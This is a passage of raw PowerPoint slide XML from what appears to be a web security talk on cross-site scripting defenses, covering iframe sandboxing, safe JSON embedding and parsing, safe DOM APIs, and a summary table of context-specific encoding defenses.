            <a:chExt cx="8716754" cy="682861"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Content Placeholder 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2129832"/>
              <a:ext cx="8716754" cy="338554"/>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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iFrame</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Sandboxing (HTML5)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Content Placeholder 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2474139"/>
              <a:ext cx="8716754" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ECE9E7"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="300"/>
                </a:spcAft>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1800" b="0" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="365760" indent="-182880" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="300"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" charset="2"/>
                <a:buChar char="ü"/>
                <a:defRPr sz="1600" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="7A6C62"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3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3pPr>
              <a:lvl4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buFont typeface="Wingdings" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>srcdoc="&lt;p&gt;This is the content&lt;/p&gt;" </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>sandbox=""&gt;&lt;/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281309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Final Thoughts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4089790264"/>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Advanced XSS defense with no encoding!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281380" y="1521176"/>
            <a:ext cx="7405420" cy="657732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Deliver main HTML document with static/safe data only in the HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627296" y="1521176"/>
            <a:ext cx="654084" cy="657732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281380" y="2244602"/>
            <a:ext cx="7405420" cy="1037860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Embed JSON safely on the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var safeJSON = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>serialize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>data.to_json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627296" y="2244602"/>
            <a:ext cx="654084" cy="1037860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281380" y="3348156"/>
            <a:ext cx="7405420" cy="1503632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Decode and parse JSON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>initData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>safeJSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627296" y="3348156"/>
            <a:ext cx="654084" cy="1503632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281380" y="4917482"/>
            <a:ext cx="7405420" cy="1270746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Parse JSON and populate the static HTML with safe JavaScript APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a) Native JavaScript properties: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>textContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> .value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>JQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> functions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>.text() .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627296" y="4917482"/>
            <a:ext cx="654084" cy="1270746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47198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P spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="1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307630"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Defense Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>107</a:t>
            </a:fld>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138941146"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348916" y="1294542"/>
          <a:ext cx="8446168" cy="4550636"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1199147">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1923271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5323750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3582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Data Type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Context</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Defense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Body/Attribute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Entity Encode/HTML Attribute Encode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JavaScript Variable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JavaScript Hex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GET Parameter</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URL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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> URL</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URL Validation,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> avoid JavaScript: URLs, Attribute Encoding, Safe URL Verification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CSS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mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>CSS Hex Encoding</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HTML</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Anywhere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HTML Sanitization (Server and Client Side)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DOM</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Safe use of JS API's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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> JavaScript</a:t>
                      </a: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Sandboxing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and Deliver from Different Domain</a:t>
                      </a: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Client Parse Time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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>JSON.parse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> or json2.js</a:t>
                      </a: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Embedded</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JSON</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Serialization</a:t>
                      </a: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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3224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Mistakes were made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Content Security Policy 3.0</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41382910"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7870004" y="108616"/>
            <a:ext cx="1166117" cy="1185927"/>
            <a:chOff x="6835420" y="635329"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Oval 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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8" name="Freeform 1"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7320232" y="881197"/>
              <a:ext cx="495511" cy="973392"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7748 w 10781"/>
                <a:gd name="T1" fmla="*/ 9164 h 21180"/>
                <a:gd name="T2" fmla="*/ 6087 w 10781"/>
                <a:gd name="T3" fmla="*/ 10781 h 21180"/>
                <a:gd name="T4" fmla="*/ 5795 w 10781"/>
                <a:gd name="T5" fmla="*/ 12668 h 21180"/>
                <a:gd name="T6" fmla="*/ 2538 w 10781"/>
                <a:gd name="T7" fmla="*/ 13273 h 21180"/>
                <a:gd name="T8" fmla="*/ 1617 w 10781"/>
                <a:gd name="T9" fmla="*/ 15722 h 21180"/>
                <a:gd name="T10" fmla="*/ 2785 w 10781"/>
                <a:gd name="T11" fmla="*/ 17429 h 21180"/>
                <a:gd name="T12" fmla="*/ 3010 w 10781"/>
                <a:gd name="T13" fmla="*/ 18799 h 21180"/>
                <a:gd name="T14" fmla="*/ 3100 w 10781"/>
                <a:gd name="T15" fmla="*/ 19360 h 21180"/>
                <a:gd name="T16" fmla="*/ 4851 w 10781"/>
                <a:gd name="T17" fmla="*/ 21179 h 21180"/>
                <a:gd name="T18" fmla="*/ 7209 w 10781"/>
                <a:gd name="T19" fmla="*/ 19787 h 21180"/>
                <a:gd name="T20" fmla="*/ 7434 w 10781"/>
                <a:gd name="T21" fmla="*/ 18799 h 21180"/>
                <a:gd name="T22" fmla="*/ 7456 w 10781"/>
                <a:gd name="T23" fmla="*/ 17743 h 21180"/>
                <a:gd name="T24" fmla="*/ 7928 w 10781"/>
                <a:gd name="T25" fmla="*/ 17429 h 21180"/>
                <a:gd name="T26" fmla="*/ 8849 w 10781"/>
                <a:gd name="T27" fmla="*/ 14105 h 21180"/>
                <a:gd name="T28" fmla="*/ 7726 w 10781"/>
                <a:gd name="T29" fmla="*/ 13273 h 21180"/>
                <a:gd name="T30" fmla="*/ 7905 w 10781"/>
                <a:gd name="T31" fmla="*/ 12129 h 21180"/>
                <a:gd name="T32" fmla="*/ 8107 w 10781"/>
                <a:gd name="T33" fmla="*/ 11477 h 21180"/>
                <a:gd name="T34" fmla="*/ 9163 w 10781"/>
                <a:gd name="T35" fmla="*/ 9635 h 21180"/>
                <a:gd name="T36" fmla="*/ 10421 w 10781"/>
                <a:gd name="T37" fmla="*/ 6266 h 21180"/>
                <a:gd name="T38" fmla="*/ 8669 w 10781"/>
                <a:gd name="T39" fmla="*/ 5884 h 21180"/>
                <a:gd name="T40" fmla="*/ 607 w 10781"/>
